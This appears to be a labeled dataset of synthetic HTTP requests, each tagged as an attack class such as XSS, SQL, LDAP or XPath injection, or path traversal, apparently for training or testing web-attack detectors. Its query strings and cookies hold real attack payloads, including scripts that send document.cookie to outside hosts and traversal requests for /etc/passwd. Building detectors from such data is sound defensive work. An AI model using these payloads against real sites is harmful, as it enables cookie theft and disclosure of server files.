Trailer: If-Modified-Since
User-Agent: Mozilla/5.8 (X11; U; SunOS sun4u 1.2; e4-7o; rv:8.7.9) Gecko/11839159
UA-CPU: x86
UA-Disp: 4049,587,8
UA-OS: FreeBSD
UA-Color: color8
Via: rno3u0/1.5 236.117.76.68
Transfer-Encoding: sinlt; m7lee5RI=cEni
Upgrade: seoi/9.8, kiihPn/6.7
Warning: 607 www.otrO6o.css "taqtatn4rh" 
X-Forwarded-For: 79.119.72.4
X-Serial-Number: 6933322511
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45958
Start - Id: 37419
class: LdapInjection
GET /cQMu/td6fhsd6l5s7buSy/XibjH9/hrNsiKD@9bYf/m1/iha/BmI/edEjaHotcletnoyieiy/eaJxg2Ub6j0oo/eo0raSj1bDNNj@8..Od/t0trtI/8D.js?7hs99iaoi6t=services%7C7co&hH=695360&eCt=971&0bhAOaa7utot=aoliPWu2b&ba=3Wkkm&oua9isd=pd8e54r&hp1ht0anas=5o&atenfrtnl=e%3Bpsiimgpassthrualnhf&dniitlt=t&ewtSIpnntnt4si=s+nperlyIle%5C+iteEa+ts&titudonji=nsqotoP&CrEonolRoh=rL7 HTTP/1.1
Host: www.wsbe0.cz:32424
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesetrad;q=0.1, big5;q=0.5, euc-tw, iso-8859-15;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: xhi5so='ahsipeh'
Client-ip: 51.179.168.95
Cookie: ttsocel=tN4c0srf;EHMJWexecdocumentwget=dX@AMY;Qd6lvJnp1ri=0e;tOzelrdf3r011=oOieqE;lo4aezc1beusai=rh6sl)(   |(2clq=*)
Cookie2: $Version="53"
Date: Thu, 22 Nov 07 08:18:19 CET
ETag: "B@@tQzgMaUoLt@gc"
Expect: 100-continue
From: eda9Oyew@bfisXrie.cz
If-Modified-Since: Sun, 20 Jun 04 07:31:00 GMT
If-Unmodified-Since: Wed, 08 Mar 06 11:53:37 GMT
If-Match: *
If-None-Match: *
If-Range: "e-wwH6M1@vxgOjf"
Max-Forwards: 4326
MIME-Version: 3.7
Pragma: rclmmniu='znhr'
Proxy-Authorization: Digest cnonce="EOlts"
Authorization: Digest username="J85iefyT"
Range: 747728-0693
Referer: /edHoNoih/bDOdhel/t5e3n/sysness/yru8ea.zip
TE: gzip
Trailer: TE
User-Agent: Mozilla/6.3 (X11; U; Open BSD i586 9.3; pe-i4; rv:1.0.2) Gecko/39879338
UA-CPU: Sparc
UA-Disp: 952,5448,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 359x5733
Via: 6.9 1.240.95.76
Transfer-Encoding: identity
Upgrade: 3len/5.0, destn/7.7, ict/1.6
Warning: 765 162.186.194.255:60063 "9jas9wzbnauexd" "Sun, 12 Oct 08 22:18:16 GMT"
X-Forwarded-For: 44.141.186.180
X-Serial-Number: 1007301637
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37419
Start - Id: 47279
class: XSS
GET /neoenjdrLo/dlsadminmCrfv4.C/llWuCl-y4L2sowuv_e/ojI-zh3tLW9zvRo.a5p0/r6k@G01Ak/8zfef/_4i73/rrmleu/gMADL1/eYl2aaesene/nilVhdWkee4nfyuVtJ/npN5g@z0q5S07S16OIHV.htm?uEi=i-echohtocqseeo&sertn=89263901&oEeoshtoOaneea=%26%3Cscript+++%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.as.com%2Fcgi-bin%2Flatari.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E&dac=sHI5LyMCnv9_&neraoltYUubak=roa HTTP/1.0
Host: www.pnceu.fr
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: euc-cn, windows-1250, euc-cn, x-mac-japanese
Accept-Encoding: compress, deflate, deflate;q=0.5, identity;q=0.2, gzip
Accept-Language: *
Cache-Control: max-stale=56727
Client-ip: 48.5.47.91
Cookie: hjesnneac6=965106;is=7669071717;ihitD2zeaoyf7ea=uln?;sr=uShe2ttHNseso;5HfeoiEmdumpn1e=84
Cookie2: $Version="73"
Date: Wed, 06 Jul 05 09:15:23 GMT
ETag: W/"rXrXQIss2Diq7_2DXw"
Expect: eplnt
From: eA3ce@Sdytnl.st
If-Modified-Since: Sun, 26 Oct 08 23:45:13 UTC
If-Unmodified-Since: Thu, 26 Nov 09 01:38:15 UTC
If-Match: "jF_P0iLzYK_9X3XGzEyq"
If-None-Match: *
If-Range: Sat, 18 Nov 06 01:53:05 UTC
Max-Forwards: 98
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM YWFmOHNyYThLaGRuZGhpbTRlRWVybmU5bnJGNWFveGNwbDli
Authorization: Digest nonce
Range: 3-25949,-0524
Referer: /stqrem/rrla/Oetbiof/us6wn5m/mutec.exe
TE: gzip;q=0.8,trailers,deflate;q=0.9
Trailer: Accept-Charset
User-Agent: eU1smWiA http://www.meAtogie.fr
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 581x8741
Via: 2.0 87.155.190.119, 7.7 www.eioste5.css:2, HTTP/5.9 www.ipSxtt.png:9
Transfer-Encoding: deflate
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 135.30.4.5
X-Serial-Number: 972806638968754
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47279
Start - Id: 48240
class: XSS
POST /joaaozaJYtce50eoin/l_HDSm350W6bv/sCUp/ajFJJmLDRFDgD/2QFXLeiJN6/L6cmdR/C1delete4_CtQCYxRZ.html? HTTP/1.0
Content-Length: 133
Content-Language: Ao,s5re8,lwott
Content-Encoding: deflate
Content-Location: http://cueEag.net/1szrin/enrkae7o.tar.gz
Content-MD5: YmFFZXl3bmFTckRkbjNvdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 14 Aug 08 21:42:51 CET
Last-Modified: Thu, 01 Jul 04 17:58:53 CET
Host: 72.52.230.183:80
Connection: close
Accept: video/*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: a6-aei;q=0.5, einsGo-mepaeIFy, mz-te2rajnn;q=0.1, 7pe-tss9
Cache-Control: no-store
Client-ip: 64.5.122.208
Cookie: rTusis=<object   classid= "   clsid:...   " codebase   = "  javascript:    [alert  ('dboefsu');]    "  >;rnyNp=sh2bqsb
Cookie2: $Version="0"
Date: Wed, 09 Aug 06 14:34:22 CET
ETag: W/"a5F@0drUtN9uI7JDS"
Expect: 100-continue
From: 4abpeimw@swTeELs5wa.de
If-Modified-Since: Fri, 02 Mar 07 18:53:43 UTC
If-Unmodified-Since: Sat, 20 Jan 07 08:26:24 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 11 Mar 05 03:34:13 GMT
Max-Forwards: 069
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWkxdGFUemhFZ29lb3ZqODlnc2k3V2NCc3dhc1hzQ2x0Y0hpdFl1cg==
Authorization: Digest opaque="ceTau"
Range: -2
Referer: /fsyo/AnozwiGN/Dhaa.cgi
TE: chunked,trailers
Trailer: Warning
User-Agent: Mozilla/6.0 (Machintosh; U; PPC Mac OS X 9.6; Ot-5n; rv:0.3.6) Gecko/92458014
UA-CPU: StrongARM
UA-Disp: 0382,578,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 582x431
Via: ac5Hns/2.0 195.126.200.89
Transfer-Encoding: gzip
Upgrade: Sey0ci/4.4, t8koji/2.5, aosy/4.1
Warning: 240 84.21.57.161 "irioudpAgtrdiY" 
X-Serial-Number: 793433345048
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2jrnatmyqe0R2T=r8x&tnvFd=277&etmE4ehdttp0x=55697&e1pe1Nr2strtat=4363803&D6sbn4e3gco=61331263&ahsyrgazke=vbscriptviE6pipeh&ytsebCra=59

End - Id: 48240
Start - Id: 38052
class: LdapInjection
GET /o0.h1U@J/wlwXbfV/ugttun9oueY/i9A.htm?3oaerp0fns=3&cRloxle=ulocationlxterm&u7WOul6=%29%28++%7C+++%28++++cn%3D*o+++%27brien*%29%28mail%3D*o+++%27brien*++++%29&wwanrta5egsuRa=83471&teqr=61&skcFXWJF02.=aBu2%40wixQe&aees8=953529&3nC9te=e0tniihL&6Om=notoxpanR&wLGr8ahnr1deod=il5ldsaaq&ssSteiru0x=owtweanioh1 HTTP/1.1
Host: 24.64.117.219
Connection: geqdhdt
Accept: */*
Accept-Charset: iso-8859-3;q=0.4, iso-8859-1;q=0.4, x-mac-greek
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 26.50.164.170
Cookie: ci3SNkutH2Kvse=rstprocessing-instructionA1F=echoa;f4eest=t:D(u8l ohu;ess=d0a7hpi8n
Cookie2: $Version="54"
Date: Wed, 10 Dec 08 21:07:54 CET
ETag: W/"xYZoPZGX1onU_eKg0nd"
Expect: oTo0xsi=menaree;nEnewski
From: iaoHwaa@inosaaos.gov
If-Modified-Since: Wed, 19 Aug 09 13:49:09 GMT
If-Unmodified-Since: Sun, 27 Jun 04 20:53:02 UTC
If-Match: "C-FHXRU04yRTEm0qt0n"
If-None-Match: *
If-Range: *
Max-Forwards: 196
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest qop=msgie5
Range: 6583-,350-4,-7502
Referer: /rtjctja7/ifo61.tar
TE: deflate
Trailer: Warning
User-Agent: ciUsiealx7h
UA-CPU: x86
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 427x816
Via: 3.5 www.RoernPt.jpeg, 9.1 91.206.248.64, ipnt/2.8 137.169.113.142
Transfer-Encoding: identity
Upgrade: omsS/1.9, atcm2/9.8, htuh6/0.3, roto/0.9, ttttRe/7.7
Warning: 211 5.85.253.98 "saoadsette" 
X-Forwarded-For: 233.230.195.96
X-Serial-Number: 94095568311644
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38052
Start - Id: 48550
class: XPathInjection
PUT /d4i_163sb3/TDv4WiMEXd7.gif? HTTP/1.1
Content-Length: 327
Content-Language: ao1,Npdnw
Content-Encoding: compress
Content-Location: /b8OTd/mlh0ieG/e3aS/DauWe.html
Content-MD5: aEJiaWRyRmV5ZG9veHJyZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Aug 08 21:42:01 CET
Last-Modified: Thu, 17 Jun 04 06:09:51 UTC
Host: 51.8.42.96
Connection: close
Accept: audio/*;q=0.1, audio/*;q=0.9, image/*;q=0.7
Accept-Charset: x-mac-arabic;q=0.5, isiri-3342;q=0.8, x-mac-chinesesimp;q=0.7
Accept-Encoding: 
Accept-Language: swvs-miat, norlrdeA-nectqsp, ciSty-nkb, 7-ve8mFmr;q=0.1, oahtIh7b-ueci;q=0.7
Cache-Control: no-store
Client-ip: 102.113.223.214
Cookie: trthermIeVarE=7eatc
Cookie2: $Version="96"
Date: Wed, 24 Jun 09 03:40:27 CET
ETag: W/"9a.@kRmZK0277p2HO0wo"
Expect: wnoeeHd
From: 5lotN@aerqwne.st
If-Modified-Since: Sat, 17 Jan 09 01:38:26 CET
If-Unmodified-Since: Fri, 27 Feb 04 02:00:01 CET
If-Match: "GvhUGbSDmQ1Xtoz"
If-None-Match: "_OI8HS55.v3-p4_NewN8"
If-Range: Tue, 30 Nov 04 09:26:14 CET
Max-Forwards: 4
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest algorithm=tlhnLxz1
Range: 4-,9-
Referer: http://www.hImPlCe.uk/es0ni.asmx
TE: chunked;q=0.8,trailers
Trailer: If-Modified-Since
User-Agent: 9etooe8r/5.2.7.7
UA-CPU: StrongARM
UA-Disp: 8923,087,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 429x1759
Via: FTP/9.7 143.89.197.3, HTTP/3.0 www.oricnAfx.jpeg
Transfer-Encoding: compress
Upgrade: lexe/0.2, mX4rfi/5.5, ue5de/1.9
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

zE5ow=9dme/7ntte/tae/child::node()[position()=946]     or     'psc'    ='&SmLhoket=88159&BAinputIocL=ntPseottnnkT0s&eT1oe3uc=e~&azRshzUrst=5&jyteoi=[h(&VM1JdlwgetconnectoQ=rdotissehs2duny&uioeaXzis=onaat~&ixq=n Cdaccess_logapfeearestn&wpw9s=aczeeexecnr ea&GzxmlbPzZ=n0er4syw&a2esi<tL

End - Id: 48550
Start - Id: 35795
class: XPathInjection
GET /EJI_/em9kqz0KCVSi0bQOu/3eVSRz0dO1tstyle4formrmo/R32tk.41le02C/YjvwinntBC9CFNWL/a9jWxtermCO62/iEpkDvUw9J272D5IBF/lS/xSe.jpg?tf6nr=5600294&pp=3S%27++++or+++++6+++++%3C++count%28path%2Fchild%3A%3A*%29+or++++%27sanpd%27+++%3D%27&8M7.r=ieJ1.7n-z99&tilmtoTethuh=weet7sUilnt&1i0wGpi6rcetNcs=qSi+ewmRoOo%3Ee%3Ex&updatePxdocumentfj1sOc@=uR0f+r%3F%25xtermyuiioq HTTP/1.1
Host: 224.19.54.114
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: bb-bsioobea, e1ztar-eHrkr0;q=0.1
Cache-Control: min-fresh=866
Client-ip: 111.27.1.64
Cookie: 4ZaaQ=33577516;uellh=Ie~
Cookie2: $Version="0"
Date: Thu, 21 Feb 08 08:02:39 CET
ETag: "BC6ce8C_dnKt4s0Z."
Expect: eenre=cursi6
From: o6sanad@eton8m.net
If-Modified-Since: Tue, 23 Jun 09 05:54:12 UTC
If-Unmodified-Since: Sun, 08 Jan 06 10:17:12 UTC
If-Match: *
If-None-Match: *
If-Range: "TD6isthNtm7jY26y"
Max-Forwards: 8
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest opaque="rt7ngt"
Referer: /tmele/escio/pEcNoat3/dt8apl.jpeg
TE: trailers,trailers
Trailer: Expect
User-Agent: estjeosooo (agzif06hd; mRDj4XqM5V; ho6RYna@q)
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 1bNUer/1.3 245.161.192.158, 8.2 www.dolma.gif, ual/3.0 6.114.3.31
Transfer-Encoding: identity
Upgrade: n2smtz/0.7
Warning: 463 52.135.104.34 "le3vso" 
X-Forwarded-For: 19.150.15.185
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35795
Start - Id: 47178
class: XSS
GET /no4grspO8iteiEe/a4iIrAWU57KjQWPqyMn/o@1z8iframeNallc/dHjV3O-XO7L5bUx0/tsdeo8sEg7w3ee3/cUVUPanpnSnUncXBBkPU/ajmidosauNrom9dt.jpeg?eR=%3Cimg+++src++++%3D++%22re+%22onmouseover+%3D++++%22++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.atri.com%2Fcgi-bin%2Fneanan.cgi%27%2Bdocument.cookie%29%3B%5D++%22%3E&7nSp6qs8eoi=69710&0m=sJB.Nv7B&ooeeNeegAih=aicmdeei&a4NHd1=7&iadoNp=cnvfgA&3xml50s6and=tbctperl&p1nRgD=eoioiapih&WdqgobOCP1=oa7ebndiaaseSyDea&echoLvqu5EztmpG5mail=vUtiddbonn&copystyleLNZGk=tpasswde9 HTTP/1.1
Host: www.thEds6.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: ophass-um8ied;q=0.6, eues-tndawa, iaehet-a;q=0.6, s-etepedpd
Cache-Control: no-store
Client-ip: 102.236.20.245
Cookie: 4ta7oC=0
Cookie2: $Version="265"
Date: Fri, 08 Jun 07 11:47:03 GMT
ETag: "mosfK1Kq7WDVNdG"
Expect: bltUcf=Sn6ay
From: atrc@mosrloac8i.net
If-Modified-Since: Mon, 05 Jun 06 14:53:18 UTC
If-Unmodified-Since: Fri, 14 Nov 08 23:34:28 CET
If-Match: *
If-None-Match: "4Cg3kkeQXLS@LRX-ixQZ"
If-Range: Thu, 23 Jul 09 10:32:21 UTC
Max-Forwards: 691
MIME-Version: 8.3
Pragma: cTbeto=ehr
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: NTLM ZmxlaU5BM2V0cnJ1YW1vY210aWV0cnRRb3J6c250bm95dFZhVGhjaHU=
Range: 80-60466,-60,-277
Referer: /3nqr.jpeg
TE: trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Tnlrsrie8
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: 8.4 39.191.145.186, esal/5.3 www.drmojfo.html
Transfer-Encoding: deflate
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 861 174.187.41.2 "rTsfbeu" 
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47178
Start - Id: 41250
class: SqlInjection
GET /rlo7peeomrioo8zhIse/estaaehfoym3ei/tGD93mGm6ptv4.mspx?iNa0athtibfg=ee%7E%3Ernntes&dwnXIaRpU6j=tGU5F1w_u&YUJMzQx0k-home=8279&snedd=ehIwb0Dr0s0&dmksib=3972486&nrdtrshsesco=ntiji9trnt6pauhae HTTP/1.1
Host: www.tuo4r.biz:29812
Connection: elzxlh9f
Accept: video/mpeg
Accept-Charset: iso-8859-9;q=0.4, cp-950, windows-1250, koi8
Accept-Encoding: OR  4316=4316
Accept-Language: *
Cache-Control: max-age=689
Client-ip: 156.64.250.125
Cookie: csy4Dr=oTeaZan;Xejresuit=ore
Cookie2: $Version="05"
Date: Sun, 13 May 07 11:23:16 UTC
ETag: W/"S9Z8LZskFpYVZo2x"
Expect: 100-continue
From: YipHgse@Wh0aus.de
If-Modified-Since: Fri, 01 Oct 04 11:42:27 UTC
If-Unmodified-Since: Fri, 21 Jul 06 19:29:02 UTC
If-Match: "dDkviAB7vacA@7Np"
If-None-Match: "9ot@EsXAGipBvI@F"
If-Range: Sun, 18 Sep 05 13:04:04 CET
Max-Forwards: 3
MIME-Version: 4.7
Pragma: d='Ioemim'
Proxy-Authorization: Digest nc=Bba58bDA
Authorization: Basic cnNhRW5uZWQ6ZGg4ZA==
Range: 377941-4452
Referer: http://dsinId.gov/sedsfc/lztoHe.wav
TE: trailers,trailers,chunked;q=0.4
Trailer: Warning
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 2.6; a0-7n; rv:8.5.0) Gecko/56854701
UA-CPU: 68000
UA-Disp: 9585,9750,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 921x845
Via: huna0/1.7 182.191.133.226
Transfer-Encoding: deflate
Upgrade: tno/0.7, leolp/4.5, ixwe/8.3
Warning: 735 149.242.13.102:8 "sooeIuiaiic2aizp" 
X-Forwarded-For: 119.121.155.105
X-Serial-Number: 48880057053
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 41250
Start - Id: 48949
class: XPathInjection
GET /oashomariaaert4ktsd/sekbr/uUnMS.css?lJM6C9y=4&wgfYWO1-varS=r5ysUx&C5Qn6g0=nghi&0a=zs&td=%7C%3De+dE%29tpAhjeen&hes5=1362++++or+++++eotf%2FrihTh8%2Fyuoo%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D92%5D+or++++38074%3D&raesinxMerjl=31&lDosjeE7ovbhlg=tttst HTTP/1.1
Host: 190.89.187.123:80
Connection: h5rmt
Accept: image/gif;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 89.226.28.116
Cookie: tdOa8iajweD8h=yIUZq;aeei9u8ltr=dsataktp6m;oftq6Rtwdee=73
Cookie2: $Version="818"
Date: Sat, 30 Oct 04 16:02:54 UTC
ETag: W/"0iRi8U9FbGRb0Am5Se"
Expect: 100-continue
From: ietdnl@1aln.fr
If-Modified-Since: Wed, 29 Jun 05 20:39:43 UTC
If-Unmodified-Since: Thu, 06 Aug 09 17:35:08 GMT
If-Match: *
If-None-Match: "F.JKE7ruYdOU8OICkJ"
If-Range: Sat, 03 Jul 04 20:09:58 GMT
Max-Forwards: 054
MIME-Version: 2.2
Pragma: 2olct=t
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: Basic YmlQaDp0a3luaQ==
Range: 5-
Referer: http://www.nvemrksb.it/lmT6/ieezti/xtyvz.jsp
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: rat4nojBeethn
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2276x9830
Via: ieugo/6.8 www.Tos7pO.js, 2.5 www.islun.tiff, ogpsx/1.4 www.iacLnt.png:0
Transfer-Encoding: compress
Upgrade: 6kse/1.8, ssz/9.9, tathn/5.4
Warning: 219 www.NUeeo.shtml "r8tNtaTA" 
X-Forwarded-For: 9.137.128.106
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48949
Start - Id: 35945
class: PathTransversal
GET /eeasaenalovEadiclrjs/eC0B5Fm0aH9xB6/Erteh2s/mX.f9YSnI2sjQ/y5PLzTf.jX0vJNVQxKjX/rnt/u9_XMOzywfBH590Ri/gqp8/bqqESH/aGW.php?c9=%3C%21--+%23include++++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&t2=hl1_&oeowihnseua=568&i9nieoohe=iodixA4t4gtlIrnyte&ntwwweols=3ise&iEahhan=arobuli%3Bexrl&irehru=LN1ioslldget&8W2a=hsleytyrelh&e8amveeeeptzwt=d%3Fywkw&tihtgAr=sWbgsoundzrseg%26ec&sgenciuflp=7636779 HTTP/1.1
Host: 102.113.112.141
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman
Accept-Language: duqtR-rin4ogs;q=0.2, Del-ltad;q=0.2, fuwleo-ihxesra;q=0.3, h-pI
Cache-Control: adEs7b='dartotx'
Date: Thu, 25 Dec 08 07:22:43 UTC
Expect: 100-continue
Max-Forwards: 868
Referer: /jphehlho/uRaejma/ona6e/ugeo/Hvgceby.html
TE: deflate;q=0.4
User-Agent: iehu7svi/3.2
UA-Pixels: 612x0492

null

End - Id: 35945
Start - Id: 36327
class: PathTransversal
GET /eFEgIg0W19MNewYl/4os.htm?UvIuWtz.3Be=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&vio8eme=azOA&reGHwe=kiVZ2HA8e3Ll HTTP/1.0
Host: 180.50.37.215
Connection: close
Accept: */*;q=0.6
Accept-Charset: euc-cn
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.9
Cache-Control: min-fresh=62
Client-ip: 61.16.222.36
Cookie: wroecnttst=hhautoexectkakltelnetnE;0sy3ea4jtvo=096;1Lkrtmne=cwqu+
Cookie2: $Version="74"
Date: Wed, 16 Aug 06 07:59:20 UTC
ETag: W/"XVnSSkhMGncEq258"
Expect: Ise1ssl
From: 5ygo@eiccrasaq.org
If-Modified-Since: Mon, 27 Dec 04 07:48:06 CET
If-Unmodified-Since: Sun, 19 Aug 07 05:16:47 GMT
If-Match: *
If-None-Match: "G4_zTr.Z2pmJyXh"
If-Range: "Mcqfsa_N5qS3LRQEldt"
Max-Forwards: 5829
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dTR1T3RUZWJpb2FwNG9xeHRzNWhlNmxybnNOYjZoNG9zc3V0ZW5zaTJpZU10Y2d0
Range: 94941-674,-88804,1546-98301
Referer: http://www.iojr.cz/reIowouo.tar.gz
TE: trailers
Trailer: User-Agent
User-Agent: oegSZ61NX http://www.pF9D4.de
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 625x983
Via: 0.6 209.184.122.136:44654, FTP/9.5 www.nwomeWer.jpg, deh/2.2 www.ttsxys.shtml
Transfer-Encoding: compress
Upgrade: itor/5.7, 4up4ta/3.2
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 876584717
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36327
Start - Id: 47746
class: XSS
GET /5etuTkadovismahe/ltj5U3nI1J/sn4nancqrrd7ziEc.js?iIshakududorse=%3Cdiv+++++style%3D+%22background-image%3A++url%28javascript%3A+%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.venaolnd.com%2Fcgi-bin%2Fge.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B+++++%22+%3E&Ttqeeh=ta HTTP/1.1
Host: www.hehh3ese.fr
Connection: bsefAfce
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress, identity;q=0.8
Accept-Language: *;q=0.5
Cache-Control: y3niSsit=yDldso
Client-ip: 58.135.32.75
Cookie: RCoptNuR=n4q_w-jT8;XmnzN1N.netcatPG=iTELdt1LeK
Cookie2: $Version="00"
Date: Thu, 08 Jan 09 19:41:46 CET
ETag: "7talGQPBsmJ_AaAgn"
Expect: 100-continue
From: timd@onRl.biz
If-Modified-Since: Wed, 22 Feb 06 11:48:37 UTC
If-Unmodified-Since: Wed, 18 Nov 09 23:33:03 UTC
If-Match: "ztaZzhDtm3BqBDYbIuK"
If-None-Match: "Bz@Od3DC@@cOUbNqW"
If-Range: "ShtQiF5mN@QGdoa8"
Max-Forwards: 0146
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic czZVbmRodDphdW5zdG9u
Authorization: 6lRTvt et6rdy=hgrgone
Range: -887125,6715-3229
Referer: /iobtrst/ee4sq/egeun.gz
TE: trailers,gzip,trailers
Trailer: Date
User-Agent: Mozilla/1.7 (X11; U; Open BSD i386 0.6; oj-ms; rv:3.3.5) Gecko/85933069
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0710x100
Via: re7he/5.9 www.enoCin.jpg:3
Transfer-Encoding: identity
Upgrade: sji/4.0, asq/5.9, arzh/5.3
Warning: 204 41.21.10.144 "pfgeDet" 
X-Forwarded-For: 198.120.124.208
X-Serial-Number: 75850540029155
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47746
Start - Id: 47624
class: XSS
GET /hCmKXhSt/2wgereae/poneu0lahoyfoedldpu/v6/OUJV-uCh1aU/op76AQ_XTCLHm@LO1.js?HBaods7d=fRshutdownpa&drbfsoLehlcw=Aomx95e0O&iawl=open&vrootrsedh=cinrreisa&t0mitntsnrSeL=%3Cimg+++dynsrc++++%3D++++%22+++javascript%3A%5Bwindow.open%28%27http%3A%2F%2F76.41.7.214%2Fon.msf%27%2Bdocument.cookie%29%3B%5D+++%22+++%3E&@@d@zkhtpassrKCA=686133&htkwxosnloihdy=dobjectio%29tform+S7execura HTTP/1.0
Host: www.dbiigsll.ch
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 58.158.9.220
Cookie: nhem96d= 6;tmSaa7hsorrac=6131197;e2hdotj1LdSet=o2JS3kK;asngs4sI=d4kperl0;l2=od
Cookie2: $Version="97"
Date: Sat, 24 Jan 04 23:35:48 GMT
ETag: W/"h1nKfSruLg2mDIS"
Expect: 100-continue
From: drEnA@edtwavoDoa.com
If-Modified-Since: Sat, 17 May 08 18:23:49 CET
If-Unmodified-Since: Tue, 12 Jul 05 02:56:30 GMT
If-Match: "WZxAhekJ3qSwjf5"
If-None-Match: *
If-Range: Sun, 10 Jul 05 19:57:30 UTC
Max-Forwards: 294
MIME-Version: 5.8
Pragma: Yi0eeina='xIphsatb'
Proxy-Authorization: Digest cnonce="femknga"
Authorization: ticsN kHan=cDbH
Range: 545-82205,788-76233
Referer: http://2fdsura.it/lndp/3eosgeic/rctt/snvas4rh.jpeg
TE: trailers,gzip,trailers
Trailer: Expect
User-Agent: aypye1p8_6 http://www.aSmle.gov
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: Atnee/2.8 231.218.90.244
Transfer-Encoding: deflate
Upgrade: eok7ht/3.9, 9eex4/3.3
Warning: 297 www.hzbts.tiff "tresi" "Wed, 25 Apr 07 19:25:41 CET"
X-Forwarded-For: 119.112.244.238
X-Serial-Number: 2524902769036083814
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47624
Start - Id: 36048
class: PathTransversal
